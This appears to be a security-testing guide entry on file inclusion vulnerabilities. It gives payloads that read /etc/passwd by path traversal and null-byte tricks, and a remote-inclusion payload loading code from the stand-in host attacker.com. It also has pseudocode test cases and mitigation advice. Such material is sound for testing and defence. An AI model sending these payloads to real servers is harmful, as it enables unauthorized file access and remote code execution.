File Inclusion

Description

File Inclusion occurs when a web application includes files based on user input without proper validation. This can lead to arbitrary file inclusion, allowing attackers to read sensitive files or execute arbitrary code.

Example with Scenario

Scenario: A web application dynamically includes a file based on a URL parameter. An attacker can manipulate the parameter to include sensitive files from the server.

Payloads and Test Cases

Payloads

1. Local File Inclusion (LFI):

   Copy

   /include?file=../../../../etc/passwd

2. Remote File Inclusion (RFI):

   Copy

   /include?file=http://attacker.com/malicious.php

3. Null Byte Injection:

   Copy

   /include?file=../../../../etc/passwd%00

Test Cases

1. Local File Inclusion (LFI):

   • Payload:

     Copy

     /include?file=../../../../etc/passwd

   • Test Case:

     Copy

     # Send payload to the server
     sendPayloadToServer("/include?file=../../../../etc/passwd")
     # Verify if the application includes the /etc/passwd file
     checkFileInclusion("/etc/passwd")

2. Remote File Inclusion (RFI):

   • Payload:

     Copy

     /include?file=http://attacker.com/malicious.php

   • Test Case:

     Copy

     # Send payload to the server
     sendPayloadToServer("/include?file=http://attacker.com/malicious.php")
     # Verify if the application includes the remote file
     checkRemoteFileInclusion("http://attacker.com/malicious.php")

3. Null Byte Injection:

   • Payload:

     Copy

     /include?file=../../../../etc/passwd%00

   • Test Case:

     Copy

     # Send payload to the server
     sendPayloadToServer("/include?file=../../../../etc/passwd%00")
     # Verify if the application includes the /etc/passwd file despite null byte
     checkFileInclusion("/etc/passwd")

Mitigation

1. Input Validation:

   • Validate and sanitize user input to ensure it does not contain malicious paths.

   • Use allow-lists to restrict input to expected file paths.

2. Disable Dynamic Inclusion:

   • Avoid using dynamic file inclusion based on user input.

   • Use static file paths or mapped identifiers for inclusion.

3. Limit File Access:

   • Restrict file access permissions to only necessary files.

   • Use chroot or containerization to limit file system exposure.

4. Error Handling:

   • Implement proper error handling to avoid revealing file system structure.

   • Return generic error messages without disclosing sensitive information.